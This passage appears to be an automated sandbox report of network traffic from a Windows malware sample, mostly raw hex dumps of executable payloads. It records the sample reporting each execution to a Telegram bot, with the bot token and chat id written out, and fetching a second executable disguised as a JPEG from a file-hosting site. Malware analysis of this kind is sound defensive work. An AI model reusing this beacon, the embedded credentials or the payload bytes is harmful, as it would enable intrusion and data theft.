                                                                                                                            2022-10-03 14:01:59 UTC1584INData Raw: 30 42 42 36 35 38 43 43 42 46 38 36 39 34 43 32 36 45 34 42 46 33 34 33 38 34 31 37 42 46 39 30 44 31 33 30 44 33 44 46 36 39 34 45 38 32 32 39 37 43 35 37 32 41 46 38 39 31 36 36 43 31 31 46 42 30 41 41 35 32 34 39 45 36 34 44 34 31 42 37 45 30 42 46 41 44 42 30 41 31 42 37 33 39 44 32 33 39 43 34 30 41 31 30 30 31 35 39 46 41 37 36 36 35 44 35 30 38 38 45 32 46 38 35 45 44 44 37 44 43 30 33 37 32 34 37 31 34 38 35 35 32 42 30 41 38 42 38 37 37 46 33 33 33 34 42 35 39 39 39 36 32 30 41 31 32 33 46 36 38 45 38 41 39 46 37 33 45 42 34 42 42 45 35 44 44 43 39 42 33 32 31 39 31 46 39 33 42 36 45 36 35 30 31 31 32 43 37 36 32 32 34 33 46 31 42 36 42 46 33 36 37 32 35 31 43 43 46 41 43 39 42 36 33 36 41 33 36 39 33 45 42 35 30 41 37 37 34 30 37 36 34 39 30 44
                                                                                                                            Data Ascii: 0BB658CCBF8694C26E4BF3438417BF90D130D3DF694E82297C572AF89166C11FB0AA5249E64D41B7E0BFADB0A1B739D239C40A100159FA7665D5088E2F85EDD7DC037247148552B0A8B877F3334B5999620A123F68E8A9F73EB4BBE5DDC9B32191F93B6E650112C762243F1B6BF367251CCFAC9B636A3693EB50A774076490D
                                                                                                                            2022-10-03 14:01:59 UTC1600INData Raw: 41 35 33 30 34 43 36 37 38 37 41 38 44 46 32 44 34 43 34 30 38 36 33 42 45 44 30 38 36 30 42 43 46 41 43 38 46 44 33 32 33 45 45 46 39 42 31 36 32 31 46 30 33 45 30 38 35 33 43 33 39 31 43 42 32 44 35 30 38 33 41 37 39 39 32 42 42 36 31 31 38 37 43 30 44 35 42 32 33 45 41 38 31 33 31 43 39 41 42 45 30 45 37 33 41 46 32 46 42 44 35 32 46 31 45 35 31 33 30 33 39 36 36 46 34 35 43 33 43 38 46 43 36 45 37 34 42 37 34 41 35 37 45 34 41 44 42 39 36 30 37 31 41 30 45 36 36 30 31 43 41 39 46 39 38 36 32 36 42 37 37 39 36 35 38 37 38 45 30 46 32 36 45 34 32 30 33 39 44 39 31 35 37 34 33 31 38 35 38 35 45 30 45 45 45 39 35 45 43 38 41 31 42 37 42 46 43 44 42 34 31 45 30 45 31 30 30 42 37 46 32 42 30 33 33 31 42 32 45 41 34 38 43 30 44 36 44 31 35 33 41 42 44 43 36
                                                                                                                            Data Ascii: A5304C6787A8DF2D4C40863BED0860BCFAC8FD323EEF9B1621F03E0853C391CB2D5083A7992BB61187C0D5B23EA8131C9ABE0E73AF2FBD52F1E51303966F45C3C8FC6E74B74A57E4ADB96071A0E6601CA9F98626B77965878E0F26E42039D91574318585E0EEE95EC8A1B7BFCDB41E0E100B7F2B0331B2EA48C0D6D153ABDC6
                                                                                                                            2022-10-03 14:01:59 UTC1616INData Raw: 30 30 30 33 30 30 42 30 30 44 39 33 30 30 30 33 30 30 36 45 30 44 39 33 30 30 30 33 30 30 38 46 30 44 43 44 30 30 30 33 30 30 39 36 30 44 39 33 30 30 30 33 30 30 41 34 30 44 39 33 30 30 30 33 30 30 39 44 30 44 39 41 30 30 30 33 30 30 41 42 30 44 39 41 30 30 30 33 30 30 31 31 30 45 39 41 30 30 30 33 30 30 37 42 30 44 39 41 30 30 30 33 30 30 46 38 30 44 39 41 30 30 30 33 30 30 46 44 30 44 39 41 30 30 30 33 30 30 30 37 30 45 39 33 30 30 30 33 30 30 30 32 30 45 39 33 30 30 30 33 30 30 30 43 30 45 39 33 30 30 30 33 30 30 30 41 30 46 39 33 30 30 30 33 30 30 38 30 30 44 39 41 30 30 30 33 30 30 34 44 30 45 39 41 30 30 30 33 30 30 44 41 30 45 43 44 30 30 30 33 30 30 46 36 30 45 43 44 30 30 30 33 30 30 45 43 30 45 43 44 30 30 30 33 30 30 30 30 30 46 43 44 30 30 30
                                                                                                                            Data Ascii: 000300B00D930003006E0D930003008F0DCD000300960D93000300A40D930003009D0D9A000300AB0D9A000300110E9A0003007B0D9A000300F80D9A000300FD0D9A000300070E93000300020E930003000C0E930003000A0F93000300800D9A0003004D0E9A000300DA0ECD000300F60ECD000300EC0ECD000300000FCD000
                                                                                                                            2022-10-03 14:01:59 UTC1632INData Raw: 30 30 39 34 30 44 37 34 30 31 30 31 30 30 41 32 30 44 37 34 30 31 30 31 30 30 36 43 30 44 44 30 30 30 30 31 30 30 36 43 30 44 41 39 30 31 33 33 30 31 36 43 30 44 32 44 32 31 33 33 30 31 38 44 30 44 32 44 32 31 33 36 30 30 36 43 30 44 41 39 30 31 33 36 30 30 38 44 30 44 41 39 30 31 33 36 30 30 39 34 30 44 41 39 30 31 33 36 30 30 41 32 30 44 41 39 30 31 33 36 30 30 39 42 30 44 41 39 30 31 33 36 30 30 41 39 30 44 33 32 32 31 33 36 30 30 36 43 30 44 36 46 32 31 33 33 30 31 36 43 30 44 37 39 32 31 33 33 30 31 38 44 30 44 37 45 32 31 33 33 30 31 39 34 30 44 38 33 32 31 33 33 30 31 41 32 30 44 38 38 32 31 33 33 30 31 39 42 30 44 38 44 32 31 33 33 30 31 41 39 30 44 39 32 32 31 35 30 32 30 30 30 30 30 30 30 30 30 39 31 31 38 41 31 31 31 31 33 30 30 30 31 30 30 35
                                                                                                                            Data Ascii: 00940D74010100A20D740101006C0DD00001006C0DA90133016C0D2D2133018D0D2D2136006C0DA90136008D0DA9013600940DA9013600A20DA90136009B0DA9013600A90D322136006C0D6F2133016C0D792133018D0D7E213301940D83213301A20D882133019B0D8D213301A90D92215020000000009118A111130001005
                                                                                                                            2022-10-03 14:01:59 UTC1648INData Raw: 46 33 30 30 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 41 30 30 32 38 30 34 30 38 46 34 30 30 30 30 30 30 30 30 43 36 30 30 38 45 31 33 39 36 30 38 32 39 30 34 34 30 46 34 30 30 30 30 30 30 30 30 39 33 30 30 36 43 30 44 39 32 30 32 32 41 30 34 36 34 46 34 30 30 30 30 30 30 30 30 38 36 31 38 43 39 31 31 39 44 30 38 32 41 30 34 38 30 46 34 30 30 30 30 30 30 30 30 38 36 30 30 36 43 30 44 41 35 30 38 32 43 30 34 38 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 39 41 31 33 37 37 30 31 32 43 30 34 39 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 41 36 31 33 37 37 30 31 32 43 30 34 41 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 42 32 31 33 37 37 30 31 32 43 30 34 42 38 46 34 30 30 30 30 30 30 30 30 43 36 30 30 42 32 31 33 31 37 30 30 32 43 30 34 43 38 46 34 30
                                                                                                                            Data Ascii: F300000000C60001128A00280408F400000000C6008E139608290440F40000000093006C0D92022A0464F4000000008618C9119D082A0480F40000000086006C0DA5082C0488F400000000C6089A1377012C0498F400000000C608A61377012C04A8F400000000C608B21377012C04B8F400000000C600B21317002C04C8F40
                                                                                                                            2022-10-03 14:01:59 UTC1664INData Raw: 30 30 30 30 30 30 38 36 30 30 36 43 30 44 33 32 30 30 44 32 30 37 39 30 35 41 30 31 30 30 30 30 30 30 38 36 30 30 36 43 30 44 34 44 30 30 44 32 30 37 39 43 35 41 30 31 30 30 30 30 30 30 38 36 30 30 38 44 30 44 33 32 30 30 44 33 30 37 41 34 35 41 30 31 30 30 30 30 30 30 38 36 30 30 38 44 30 44 34 44 30 30 44 33 30 37 42 30 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 34 30 44 33 32 30 30 44 34 30 37 42 38 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 34 30 44 34 44 30 30 44 34 30 37 43 34 35 41 30 31 30 30 30 30 30 30 38 36 30 30 41 32 30 44 33 32 30 30 44 35 30 37 43 43 35 41 30 31 30 30 30 30 30 30 38 36 30 30 41 32 30 44 34 44 30 30 44 35 30 37 44 38 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 42 30 44 33 32 30 30 44 36 30 37 45 30 35 41 30 31 30 30 30
                                                                                                                            Data Ascii: 00000086006C0D3200D207905A0100000086006C0D4D00D2079C5A0100000086008D0D3200D307A45A0100000086008D0D4D00D307B05A010000008600940D3200D407B85A010000008600940D4D00D407C45A010000008600A20D3200D507CC5A010000008600A20D4D00D507D85A0100000086009B0D3200D607E05A01000
                                                                                                                            2022-10-03 14:01:59 UTC1680INData Raw: 30 30 38 36 30 30 36 43 30 44 45 41 32 30 35 38 30 42 41 38 42 41 30 31 30 30 30 30 30 30 38 36 30 30 36 43 30 44 45 33 32 30 35 38 30 42 42 43 42 41 30 31 30 30 30 30 30 30 43 36 30 38 30 31 31 32 37 42 30 30 35 39 30 42 43 34 42 41 30 31 30 30 30 30 30 30 43 36 30 38 30 31 31 32 37 46 30 30 35 39 30 42 46 34 42 41 30 31 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 41 30 30 35 41 30 42 33 30 42 44 30 31 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 34 30 30 35 42 30 42 34 43 42 44 30 31 30 30 30 30 30 30 38 36 31 38 43 39 31 31 31 37 30 30 35 42 30 42 35 34 42 44 30 31 30 30 30 30 30 30 39 33 30 30 36 43 30 44 41 34 30 39 35 42 30 42 30 30 30 30 30 30 30 30 30 33 30 30 38 36 31 38 43 39 31 31 41 32 30 35 35 43 30 42 30 30 30 30 30 30 30 30 30 33 30 30 43
                                                                                                                            Data Ascii: 0086006C0DEA20580BA8BA0100000086006C0DE320580BBCBA01000000C60801127B00590BC4BA01000000C60801127F00590BF4BA01000000C60001128A005A0B30BD01000000C600011284005B0B4CBD010000008618C91117005B0B54BD0100000093006C0DA4095B0B0000000003008618C911A2055C0B000000000300C
                                                                                                                            2022-10-03 14:01:59 UTC1696INData Raw: 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30
                                                                                                                            Data Ascii: 0001006C0D000002008D0D00000300940D000001006C0D000001006C0D000002008D0D000001006C0D000001006C0D000002008D0D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D00000
                                                                                                                            2022-10-03 14:01:59 UTC1712INData Raw: 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 34 30 30 41 32 30 44 30 30 30 30 30 31 30 30 36 43 30 44 31 30 31 30 30 32 30 30 38 44 30 44 31 30 31 30 30 33 30 30 39 34 30 44 31 30 31 30 30 34 30 30 41 32 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36
                                                                                                                            Data Ascii: 008D0D00000300940D00000400A20D000001006C0D101002008D0D10100300940D10100400A20D000001006C0D000001006C0D000001006C0D000002008D0D00000300940D000001006C0D000001006C0D000002008D0D00000300940D000001006C0D000001006C0D000001006C0D000002008D0D00000300940D000001006
                                                                                                                            2022-10-03 14:01:59 UTC1728INData Raw: 32 32 30 30 30 31 30 30 30 30 31 42 30 30 35 39 31 39 30 39 30 31 30 30 30 30 34 33 30 30 31 45 32 32 32 30 30 31 30 30 30 30 31 42 30 30 35 39 31 39 32 39 30 31 30 30 30 30 34 33 30 30 35 38 32 32 34 39 30 31 30 30 30 30 34 33 30 30 37 34 32 32 36 39 30 31 30 30 30 30 34 33 30 30 38 46 32 32 38 39 30 31 30 30 30 30 34 33 30 30 41 35 32 32 41 39 30 31 30 30 30 30 34 33 30 30 42 42 32 32 43 39 30 31 30 30 30 30 34 33 30 30 44 31 32 32 45 39 30 31 30 30 30 30 34 33 30 30 45 38 32 32 30 39 30 32 30 30 30 30 34 33 30 30 46 46 32 32 32 39 30 32 30 30 30 30 34 33 30 30 31 36 32 33 34 39 30 32 30 30 30 30 34 33 30 30 33 33 32 33 36 39 30 32 30 30 30 30 34 33 30 30 34 41 32 33 38 39 30 32 30 30 30 30 34 33 30 30 36 31 32 33 41 39 30 32 30 30 30 30 34 33 30 30 37
                                                                                                                            Data Ascii: 22000100001B0059190901000043001E22200100001B005919290100004300582249010000430074226901000043008F22890100004300A522A90100004300BB22C90100004300D122E90100004300E822090200004300FF22290200004300162349020000430033236902000043004A238902000043006123A902000043007
                                                                                                                            2022-10-03 14:01:59 UTC1744INData Raw: 36 46 36 43 36 35 30 30 35 33 37 39 37 33 37 34 36 35 36 44 32 45 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 32 45 35 30 37 32 36 39 36 45 36 33 36 39 37 30 36 31 36 43 30 30 35 37 36 39 36 45 36 34 36 46 37 37 37 33 34 39 36 34 36 35 36 45 37 34 36 39 37 34 37 39 30 30 35 37 36 39 36 45 36 34 36 46 37 37 37 33 35 30 37 32 36 39 36 45 36 33 36 39 37 30 36 31 36 43 30 30 35 33 36 35 36 33 37 35 37 32 36 35 35 33 37 34 37 32 36 39 36 45 36 37 30 30 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 34 33 37 32 36 39 37 34 36 39 36 33 36 31 36 43 34 31 37 34 37 34 37 32 36 39 36 32 37 35 37 34 36 35 30 30 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 34 35 37 38 36 33 36 35 37 30 37 34 36 39 36 46 36 45 30 30 35 35 36 45 37 36 36 35 37 32 36 39 36 36 36
                                                                                                                            Data Ascii: 6F6C650053797374656D2E53656375726974792E5072696E636970616C0057696E646F77734964656E746974790057696E646F77735072696E636970616C00536563757265537472696E67005365637572697479437269746963616C417474726962757465005365637572697479457863657074696F6E00556E76657269666
                                                                                                                            2022-10-03 14:01:59 UTC1760INData Raw: 37 34 36 39 36 46 36 45 35 33 36 33 36 46 37 30 36 35 34 33 36 31 36 43 36 43 36 32 36 31 36 33 36 42 37 33 34 45 36 46 37 34 35 33 36 35 37 34 30 30 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 35 32 36 35 37 31 37 35 36 39 37 32 36 35 36 34 35 30 37 32 36 46 36 44 36 46 37 34 36 39 36 46 36 45 30 30 34 33 36 31 36 45 36 45 36 46 37 34 34 35 37 38 36 35 36 33 37 35 37 34 36 35 34 36 36 39 36 43 36 35 34 39 36 45 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 30 30 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 37 33 34 45 36 46 37 34 34 36 37 32 36 46 37 41 36 35 36 45 30 30 34 44 36 31 37 38 36 39 36 44 37 35 36 44 34 45 37 34 35 33 37 34 36 31 37 34 37 35 37 33 30 30 45 45 38 30 38 30 30 30 45
                                                                                                                            Data Ascii: 74696F6E53636F706543616C6C6261636B734E6F74536574005472616E73616374696F6E526571756972656450726F6D6F74696F6E0043616E6E6F744578656375746546696C65496E5472616E73616374696F6E005472616E73616374696F6E734E6F7446726F7A656E004D6178696D756D4E7453746174757300EE808000E
                                                                                                                            2022-10-03 14:01:59 UTC1776INData Raw: 31 43 31 30 31 31 38 34 32 30 30 44 30 30 30 36 31 31 38 34 43 43 31 38 31 30 31 38 31 38 31 30 31 38 30 39 30 39 30 42 30 30 30 35 31 31 38 34 43 43 31 38 31 38 31 38 30 39 31 30 30 39 30 44 30 30 30 35 31 31 38 34 43 43 31 38 31 30 31 38 31 30 31 38 30 39 31 30 30 39 31 33 30 30 30 42 31 31 38 34 43 43 31 30 31 38 31 31 38 31 35 43 31 38 31 38 31 38 31 38 30 32 30 38 30 38 30 38 31 38 30 38 30 30 30 33 31 31 38 34 43 43 31 38 30 32 30 39 30 42 30 30 30 34 31 31 38 34 43 43 31 38 31 30 31 38 31 30 31 38 30 39 31 30 30 30 30 35 31 31 38 34 43 43 31 38 31 31 38 34 44 38 31 30 31 31 38 34 44 34 30 39 31 30 30 39 30 38 30 30 30 32 31 31 38 34 43 43 31 38 31 30 30 39 31 32 30 30 30 34 31 31 38 34 43 43 31 30 31 38 31 31 38 31 34 38 31 30 31 31 38 34 31 43 31
                                                                                                                            Data Ascii: 1C101184200D00061184CC18101818101809090B00051184CC1818180910090D00051184CC181018101809100913000B1184CC101811815C1818181802080808180800031184CC1802090B00041184CC1810181018091000051184CC181184D8101184D40910090800021184CC1810091200041184CC10181181481011841C1
                                                                                                                            2022-10-03 14:01:59 UTC1792INData Raw: 31 44 30 33 30 37 30 37 30 33 30 38 30 32 31 32 38 33 35 30 31 30 30 37 30 36 31 32 37 38 31 44 30 35 31 32 38 30 46 30 31 32 38 33 38 34 31 32 38 32 36 43 30 41 31 34 30 37 30 39 31 32 38 33 45 34 30 38 31 32 38 32 44 43 31 32 38 34 37 30 31 32 38 32 38 34 30 38 31 32 33 31 31 38 31 39 30 38 30 30 30 32 31 32 33 31 31 32 38 32 42 39 30 38 30 39 30 37 30 31 31 35 31 32 36 44 30 31 31 32 38 30 46 30 30 33 30 37 30 31 31 43 30 45 32 30 30 34 31 43 31 31 38 31 37 44 31 32 38 31 37 39 31 44 31 43 31 32 38 30 43 35 30 36 30 37 30 33 31 43 30 41 31 32 33 31 30 37 32 30 30 32 30 31 31 31 38 31 39 39 30 34 30 37 32 30 30 32 30 31 31 31 38 31 39 39 30 38 32 45 30 37 31 34 31 32 38 31 33 30 30 38 31 32 38 33 45 34 30 38 30 38 30 38 30 38 31 44 31 43 31 32 38 30 38
                                                                                                                            Data Ascii: 1D03070703080212835010070612781D051280F012838412826C0A1407091283E4081282DC128470128284081231181908000212311282B90809070115126D011280F00307011C0E20041C11817D1281791D1C1280C50607031C0A1231072002011181990407200201118199082E0714128130081283E4080808081D1C12808
                                                                                                                            2022-10-03 14:01:59 UTC1808INData Raw: 36 32 30 30 33 30 30 30 33 37 30 30 33 38 30 30 36 32 30 30 33 37 30 30 33 35 30 30 36 32 30 30 33 33 30 30 30 30 31 35 37 30 30 30 36 31 30 30 37 32 30 30 36 31 30 30 36 44 30 30 36 35 30 30 37 34 30 30 36 35 30 30 37 32 30 30 37 33 30 30 30 30 34 46 34 44 30 30 36 39 30 30 36 33 30 30 37 32 30 30 36 46 30 30 37 33 30 30 36 46 30 30 36 36 30 30 37 34 30 30 32 30 30 30 35 33 30 30 36 46 30 30 36 36 30 30 37 34 30 30 37 37 30 30 36 31 30 30 37 32 30 30 36 35 30 30 32 30 30 30 34 42 30 30 36 35 30 30 37 39 30 30 32 30 30 30 35 33 30 30 37 34 30 30 36 46 30 30 37 32 30 30 36 31 30 30 36 37 30 30 36 35 30 30 32 30 30 30 35 30 30 30 37 32 30 30 36 46 30 30 37 36 30 30 36 39 30 30 36 34 30 30 36 35 30 30 37 32 30 30 30 30 31 42 35 32 30 30 35 33 30 30 34 31 30
                                                                                                                            Data Ascii: 620030003700380062003700350062003300001570006100720061006D0065007400650072007300004F4D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F0076006900640065007200001B52005300410


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.349701149.154.167.220443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2022-10-03 14:03:09 UTC1814OUTGET /bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exe HTTP/1.1
                                                                                                                            Host: api.telegram.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2022-10-03 14:03:09 UTC1814INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Mon, 03 Oct 2022 14:03:09 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2022-10-03 14:03:09 UTC1815INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 34 31 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 37 30 30 34 32 34 34 38 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 65 77 6c 69 66 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 65 67 65 36 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 31 34 33 34 38 33 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 64 61 76 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 6d 61 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 5f 6e 69 70 70 6c 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 36 34 38 30 35 37 38 39 2c 22 74 65 78 74 22 3a 22 5c
                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":24106,"from":{"id":5700424484,"is_bot":true,"first_name":"newlife","username":"jege6bot"},"chat":{"id":1391434830,"first_name":"dave","last_name":"matt","username":"Ma_nipple","type":"private"},"date":1664805789,"text":"\


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.2.349702144.76.120.25443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2022-10-03 14:03:31 UTC1815OUTGET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1
                                                                                                                            Host: www.uplooder.net
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2022-10-03 14:03:31 UTC1815INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.21.4
                                                                                                                            Date: Mon, 03 Oct 2022 14:03:31 GMT
                                                                                                                            Content-Type: image/jpeg
                                                                                                                            Content-Length: 1857536
                                                                                                                            Connection: close
                                                                                                                            Last-Modified: Mon, 03 Oct 2022 10:48:24 GMT
                                                                                                                            ETag: "1c5800-5ea1f1538ceae"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2022-10-03 14:03:31 UTC1815INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                                                                                            2022-10-03 14:03:31 UTC1831INData Raw: 32 38 36 46 30 30 30 30 30 36 30 41 30 32 32 38 36 46 30 30 30 30 30 36 30 42 30 32 30 37 30 36 30 33 30 34 32 38 35 44 30 30 30 30 30 36 32 38 35 31 30 31 30 30 30 36 32 41 30 30 30 30 32 32 30 32 30 33 36 46 35 31 30 31 30 30 30 36 32 41 30 30 30 30 30 30 32 45 37 32 37 33 30 30 30 30 37 30 37 33 36 46 30 30 30 30 30 41 37 41 31 42 33 30 30 46 30 30 37 44 30 30 30 30 30 30 31 44 30 30 30 30 31 31 44 30 32 43 30 30 30 30 30 31 32 38 35 36 30 30 30 30 30 41 37 32 41 42 30 30 30 30 37 30 31 46 32 34 31 34 37 45 37 30 30 30 30 30 30 41 31 34 32 38 37 31 30 30 30 30 30 41 30 41 30 36 32 43 30 42 30 36 30 32 31 34 36 46 37 32 30 30 30 30 30 41 32 36 44 45 35 30 44 45 30 33 32 36 44 45 30 30 30 30 30 32 36 46 37 33 30 30 30 30 30 41 30 42 30 37 36 46 37 34 30
                                                                                                                            Data Ascii: 286F0000060A02286F0000060B0207060304285D00000628510100062A00002202036F510100062A0000002E7273000070736F00000A7A1B300F007D0000001D000011D02C000001285600000A72AB0000701F24147E7000000A14287100000A0A062C0B0602146F7200000A26DE50DE0326DE0000026F7300000A0B076F740
                                                                                                                            2022-10-03 14:03:31 UTC1847INData Raw: 30 32 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 31 31 30 32 30 30 30 34 31 34 46 45 30 36 38 32 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37 42 39 31 30 31 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 39 31 30 31 30 30 30 34 31 34 46 45 30 36 38 42 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37 42 44 41 30 31 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 44 41 30 31 30 30 30 34 31 34 46 45 30 36 34 30 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37
                                                                                                                            Data Ascii: 0200040A120028B7050006027B1102000414FE0682010006732A02000673B90100066F9D00000A25027B910100040A120028B7050006027B9101000414FE068B010006732A02000673B90100066F9D00000A25027BDA0100040A120028B7050006027BDA01000414FE0640010006732A02000673B90100066F9D00000A25027
                                                                                                                            2022-10-03 14:03:31 UTC1863INData Raw: 46 38 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 44 33 33 32 33 30 33 36 46 44 43 30 35 30 30 30 36 32 44 31 42 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 37 45 39 46 30 30 30 30 30 41 32 38 41 30 30 30 30 30 30 41 30 41 33 38 43 43 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 46 30 46 33 33 32 36 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 30 33 37 34 42 37 30 30 30 30 30 32 36 46 39 46 30 34 30 30 30 36 37 33 39 39 30 30 30 30 30 41 32 38 41 30 30 30 30 30 30 41 30 41 33 38 39 43 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 32 36 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 30 33 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30
